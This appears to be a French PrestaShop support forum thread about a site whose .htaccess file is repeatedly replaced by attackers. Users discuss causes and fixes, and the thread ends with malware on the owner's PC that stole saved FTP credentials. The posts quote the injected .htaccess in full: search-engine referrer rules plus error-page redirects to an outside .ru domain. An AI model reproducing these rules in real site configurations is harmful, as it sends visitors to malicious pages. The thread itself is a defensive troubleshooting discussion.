Jump to content

htaccess piratage journalier


Recommended Posts

Bonjour

J attends toujours une solution pour le piratage de mon .htaccess recurent depuis 6 mois sur mon site www.odyssee-groupe.com.

Merci de m aider.

Aucune trace sur les logs.


---------------------------------------------------
SetEnv REGISTER_GLOBALS 0

SetEnv PHP_VER 5

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OR]

RewriteCond %{HTTP_REFERER} .*youtube.* [OR]

RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]

RewriteCond %{HTTP_REFERER} .*qq.* [OR]

RewriteCond %{HTTP_REFERER} .*excite.* [OR]

RewriteCond %{HTTP_REFERER} .*altavista.* [OR]

RewriteCond %{HTTP_REFERER} .*msn.* [OR]

RewriteCond %{HTTP_REFERER} .*netscape.* [OR]

RewriteCond %{HTTP_REFERER} .*aol.* [OR]

RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]

RewriteCond %{HTTP_REFERER} .*goto.* [OR]

RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]

RewriteCond %{HTTP_REFERER} .*mamma.* [OR]

RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]

RewriteCond %{HTTP_REFERER} .*lycos.* [OR]

RewriteCond %{HTTP_REFERER} .*search.* [OR]

RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]

RewriteCond %{HTTP_REFERER} .*bing.* [OR]

RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]

RewriteCond %{HTTP_REFERER} .*facebook.* [OR]

RewriteCond %{HTTP_REFERER} .*twitter.* [OR]

RewriteCond %{HTTP_REFERER} .*blog.* [OR]

RewriteCond %{HTTP_REFERER} .*live.* [OR]

RewriteCond %{HTTP_REFERER} .*myspace.* [OR]

RewriteCond %{HTTP_REFERER} .*mail.* [OR]

RewriteCond %{HTTP_REFERER} .*yandex.* [OR]

RewriteCond %{HTTP_REFERER} .*rambler.* [OR]

RewriteCond %{HTTP_REFERER} .*ya.* [OR]

RewriteCond %{HTTP_REFERER} .*aport.* [OR]

RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]

RewriteCond %{HTTP_REFERER} .*flickr.*





# .htaccess automaticaly generated by PrestaShop e-commerce open-source solution

# http://www.prestashop.com - http://www.prestashop.com/forums



# URL rewriting module activation

RewriteEngine on



# URL rewriting rules



# Catch 404 errors

ErrorDocument 404 404.php

----------------------------------------------------------

Cdlt
leking94
06.13.95.45.01

Link to comment
Share on other sites

non pas fait de mise a jour, car je n arrive pas a re-installe mon panier en ht avec tva meme en copie.

j ai changé plusieurs fois les codes ftp et admin hébergement
mdp compte mail

je ne sais pas comment ils font.

c est que le haccess : peut on empecher la ré écriture de ce fichier

j ai l impression qu il est généré en interne automatiquement.

j ai installé un pack de langue russe - est ce la dedans ? je l ai supprimé et ca continue.

Link to comment
Share on other sites

Pas la mojndre idée, c'est assez complexe de trouver la cause, mais bien entendu vous pouvez bloquer le htaccess en lui mettant des droit très limités.

Attention à ne pas retirer tous les droits dessus sinon plus possible de le modifier.

Link to comment
Share on other sites

Bonjour, il y aurait pas un cron sur le htaccess ? en fait un cron sur un fichier qui réecrit le htaccess ou alors qui l'efface et en crée un nouveau... ou alors qui copie un htaccess qui serait caché dans un coin sur la racine... et rien de rien sur les logs ? vous êtes chez ovh?

Link to comment
Share on other sites

BONJOUR
> >
> > VIENS D ETRE PIRATE PAR CHANGEMENT DE MON HTACCESS
> > ACTUELLEMENT EN LIGNE SOUS http://www.odyssee-groupe.com/

mon site est bloqué
> >
rien sur les LOGS OVH - C EST ARRIVE IL Y A 1 HEURE A PEUT PRES
>
>
> PIRATAGE AUJOURDHUI A 14H45 D APRES LE FICHIER HTACCESS REMPLACé.


maintenant il faut regarder ce qui s'est passé dan les log en comparant l'heure du fichier htaccess sur votre serveur.
Link to comment
Share on other sites

voila j ai trouve

alors quelle solution ca fait 6 mois que ca dure





























RewriteEngine On

ErrorDocument 400 http://meeshondacars.ru/pingvi/index.php

ErrorDocument 401 http://meeshondacars.ru/pingvi/index.php

ErrorDocument 403 http://meeshondacars.ru/pingvi/index.php

ErrorDocument 404 http://meeshondacars.ru/pingvi/index.php

ErrorDocument 500 http://meeshondacars.ru/pingvi/index.php

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]

RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]

RewriteCond %{HTTP_REFERER} .*baidu.* [OR]

RewriteCond %{HTTP_REFERER} .*youtube.* [OR]

RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]

RewriteCond %{HTTP_REFERER} .*qq.* [OR]

RewriteCond %{HTTP_REFERER} .*excite.* [OR]

RewriteCond %{HTTP_REFERER} .*altavista.* [OR]

RewriteCond %{HTTP_REFERER} .*msn.* [OR]

RewriteCond %{HTTP_REFERER} .*netscape.* [OR]

RewriteCond %{HTTP_REFERER} .*aol.* [OR]

RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]

RewriteCond %{HTTP_REFERER} .*goto.* [OR]

RewriteCond %{HTTP_REFERER} .*infoseek.*

Link to comment
Share on other sites

  • 1 month later...

Bonjour,

Avez vous trouvé une solution ?

Le menu d'administration de presta permet de générer le .htaccess, il y a donc un script php qui permet de le modifier installé sur ton serveur.
Il y a peut être une faille sur ce script ?

As tu installé la dernière version de PrestaShop ?

A ta place, je tenterai de supprimer ou renommer le script générant le .htaccess, c'est peut être un robot qui utilise une faille...

Link to comment
Share on other sites

Bonjour, je reviens sur le sujet car il m'est arrivé la meme chose, un htacces a été ajouté à la racine de mon serveur, je le surveille tous les jours mais ça revient de façon récurente, j'ai remplacé les mots de passe d'acces ftp etc et forcé chmod pour protéger les fichiers en écriture mais rien n'y fait!! Le problème c'est que google avait détecté certains liens de nos sites comme abritant des malware .... une fois désinfecté, j'ai refait une demande à google qui a enlevé ses avertissements mais je suis obligé de surveiller de tres pres pour effacer ce fameux htacces qui me pourrit la vie.
J'ai pourtant cherché mais pas trouvé de solution.

Link to comment
Share on other sites

:)

Pour ceux que ça intéresse :

* Je suis en train de monter un serveur sécurisé contre ce genre de choses ...

Certains de mes clients se sont fait vérolé leur site, et ensuite le schéma classique : le temps de s'en apercevoir, black-listé par Google, et le temps qu'il revienne scanner le site : perte de chiffre d'affaire, de la confiance des nouveaux clients, etc ...

Aussi afin de réagir, ai-je cherché une solution d'une société existante et spécialisée ... que nenni trouvais-je ...

Aucune ne proposait de solution efficace, si ce n'est pour des "grands comptes" (EDF, Vivendi, laposte, etc ...)

Donc, il m'est apparu clairement que la seule façon de se protéger était de maîtriser les choses, à commencer par le serveur et les applications qui tournent dessus.

Ensuite, de développer des interfaces d'utilisation pour les propriétaires de sites ...

Si vous êtes intéressé pour prendre une place sur ce serveur (elles sont forcément limitées), faites-moi signe :

Sur Skype : captain_flam_88

ou par Message Privé.

:-)
Link to comment
Share on other sites

Bonjour à tous
Suite à tous ces désagrément, nous avons découvert d'ou venait le problème de piratage. En fait l'acces vers le serveur se fait via le ftp. En effet, un malware à été detecté sur la machine dont on se sert pour l'acces ftp (acces avec FTP Expert).
Le malware en question récupère les mots de passe ftp de la machine. On devine la suite !!
La solution: Télécharger dans un premier temps le logiciel Adaware (gratuit) et apres les mise à jour, lancer un scan complet (c'est long mais vous serez surpris du nombre de vilaines bébètes présentes sur votre machine).
Faites la meme chose sur toutes les machines susceptibles d'avoir un acces ftp. Ensuite, changez tous vos mots de passe ftp et préférez le webtransfert proposé par votre fournisseur.Surtout n'utilisez plus (du moins pour quelques temps) votre client ftp. Le cas échéant, changez aussi le mot de passe de votre acces privé sur le site du serveur.
L'deal pour vérifier votre fichier htaccess est d'avoir un acces ftp via votre téméphone portable.
Apres vérification des logs pendant quelques jours vous verrez que l'acces pirate à été stoppé faute de pouvoir récupérer le mot de passe ftp.
J'espère que celà vous aidera

Link to comment
Share on other sites

  • 2 weeks later...

Bonjour,
autre petite astuce si vos sites sont dans des répertoires et non pas à la racine du serveur dans laquelle le fichier .htacces piraté revenait régulièrement.
Insérez ce bout de code php dans la page index.php de votre prestashop ainsi que dans l'index.php de l'admin.
Ainsi le fameux .htacces indésirable sera systématiquement effacé à chaque fois que quelqu'un se connectera à votre site.
(Je le répète à n'utiliser que si votre (vos) site(s) est (sont) dans des répertoires et non pas à la racine du serveur.)

  $fichier = '../.htaccess';

  if( file_exists ( $fichier))
    unlink( $fichier ) ;


A utiliser à vos risques et périls ;)

Link to comment
Share on other sites

  • 4 months later...

Retour sur le sujet avec un petit plus pour la securité des mots de passe avec windows 7, refusez la mise en cache de vos identifiants et mots de passe depuis votre navigateur , et pour entrer vos identifiants, utilisez le clavier virtuel de windows

voilà , bonne journée

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...